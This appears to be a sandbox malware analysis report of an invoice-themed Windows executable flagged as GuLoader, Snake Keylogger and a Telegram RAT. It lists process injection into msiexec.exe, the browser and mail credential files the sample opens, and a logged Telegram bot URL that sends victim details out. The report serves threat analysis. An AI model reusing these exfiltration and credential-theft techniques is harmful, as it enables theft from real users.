Source: msiexec.exe, 00000007.00000002.2684388544.0000000025A0A000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: global block list test formVMware20,11696494690
Source: msiexec.exe, 00000007.00000002.2684388544.0000000025A0A000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Test URL for global passwords blocklistVMware20,11696494690
Source: msiexec.exe, 00000007.00000002.2684388544.0000000025A0A000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: discord.comVMware20,11696494690f
Source: msiexec.exe, 00000007.00000002.2684388544.0000000025A0A000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: trackpan.utiitsl.comVMware20,11696494690h
Source: C:\Users\user\Desktop\FACTURA A00072-24.- TPC CORPORATE EVENTS SL - PILAR FORGA.exe API call chain: ExitProcess graph end node
Source: C:\Users\user\Desktop\FACTURA A00072-24.- TPC CORPORATE EVENTS SL - PILAR FORGA.exe API call chain: ExitProcess graph end node
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation Jump to behavior
Checks if the current process is being debugged
Source: C:\Windows\SysWOW64\msiexec.exe Process queried: DebugPort Jump to behavior
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_00B1F2A0 LdrInitializeThunk,LdrInitializeThunk, 2_2_00B1F2A0
Enables debug privileges
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Process token adjusted: Debug Jump to behavior

HIPS / PFW / Operating System Protection Evasion
barindex
Early bird code injection technique detected
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created / APC Queued / Resumed: C:\Windows\SysWOW64\msiexec.exe Jump to behavior
Queues an APC in another process (thread injection)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread APC queued: target process: C:\Windows\SysWOW64\msiexec.exe Jump to behavior
Writes to foreign memory regions
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\SysWOW64\msiexec.exe base: 44D0000 Jump to behavior
Creates a process in suspended mode (likely to inject code)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe" Jump to behavior
Queries the volume information (name, serial number etc) of a device
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure.CimCmdlets\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.CimCmdlets.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Queries volume information: C:\Windows\SysWOW64\msiexec.exe VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\FACTURA A00072-24.- TPC CORPORATE EVENTS SL - PILAR FORGA.exe Code function: 0_2_0040338F EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess, 0_2_0040338F

Stealing of Sensitive Information
barindex
Yara detected Snake Keylogger
Source: Yara match File source: 00000007.00000002.2682565213.0000000024661000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Yara detected Telegram RAT
Source: Yara match File source: Process Memory Space: msiexec.exe PID: 1508, type: MEMORYSTR
Tries to harvest and steal browser information (history, passwords, etc)
Source: C:\Windows\SysWOW64\msiexec.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Top Sites Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies Jump to behavior
Tries to steal Mail credentials (via file / registry access)
Source: C:\Windows\SysWOW64\msiexec.exe File opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\ Jump to behavior
Yara detected Credential Stealer
Source: Yara match File source: Process Memory Space: msiexec.exe PID: 1508, type: MEMORYSTR

Remote Access Functionality
barindex
Yara detected Snake Keylogger
Source: Yara match File source: 00000007.00000002.2682565213.0000000024661000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Yara detected Telegram RAT
Source: Yara match File source: Process Memory Space: msiexec.exe PID: 1508, type: MEMORYSTR
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1559215 Sample: FACTURA A00072-24.- TPC COR... Startdate: 20/11/2024 Architecture: WINDOWS Score: 100 22 reallyfreegeoip.org 2->22 24 api.telegram.org 2->24 26 4 other IPs or domains 2->26 34 Found malware configuration 2->34 36 Multi AV Scanner detection for dropped file 2->36 38 Yara detected GuLoader 2->38 44 3 other signatures 2->44 8 FACTURA A00072-24.- TPC CORPORATE EVENTS SL - PILAR FORGA.exe 1 15 2->8         started        signatures3 40 Tries to detect the country of the analysis system (by using the IP) 22->40 42 Uses the Telegram API (likely for C&C communication) 24->42 process4 process5 10 powershell.exe 28 8->10         started        file6 20 FACTURA A00072-24....L - PILAR FORGA.exe, PE32 10->20 dropped 46 Early bird code injection technique detected 10->46 48 Writes to foreign memory regions 10->48 50 Found suspicious powershell code related to unpacking or dynamic code loading 10->50 52 3 other signatures 10->52 14 msiexec.exe 15 8 10->14         started        18 conhost.exe 10->18         started        signatures7 process8 dnsIp9 28 api.telegram.org 149.154.167.220, 443, 49732 TELEGRAMRU United Kingdom 14->28 30 checkip.dyndns.com 158.101.44.242, 49713, 49718, 49720 ORACLE-BMC-31898US United States 14->30 32 3 other IPs or domains 14->32 54 Tries to steal Mail credentials (via file / registry access) 14->54 56 Tries to harvest and steal browser information (history, passwords, etc) 14->56 signatures10
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
149.154.167.220
 api.telegram.org United Kingdom
62041 TELEGRAMRU false
188.114.96.3
 reallyfreegeoip.org European Union
13335 CLOUDFLARENETUS false
142.250.186.110
 drive.google.com United States
15169 GOOGLEUS false
216.58.206.65
 drive.usercontent.google.com United States
15169 GOOGLEUS false
158.101.44.242
 checkip.dyndns.com United States
31898 ORACLE-BMC-31898US false

Contacted Domains

Name IP Active
drive.google.com 142.250.186.110 true
drive.usercontent.google.com 216.58.206.65 true
reallyfreegeoip.org 188.114.96.3 true
api.telegram.org 149.154.167.220 true
checkip.dyndns.com 158.101.44.242 true
checkip.dyndns.org unknown unknown

Contacted URLs

Name Malicious Antivirus Detection Reputation
https://reallyfreegeoip.org/xml/8.46.123.75 false
    		high
    http://checkip.dyndns.org/ false
      		high
      https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:320946%0D%0ADate%20and%20Time:%2020/11/2024%20/%2016:01:55%0D%0ACountry%20Name:%20United%20States%0D%0A[%20320946%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20] false
        		high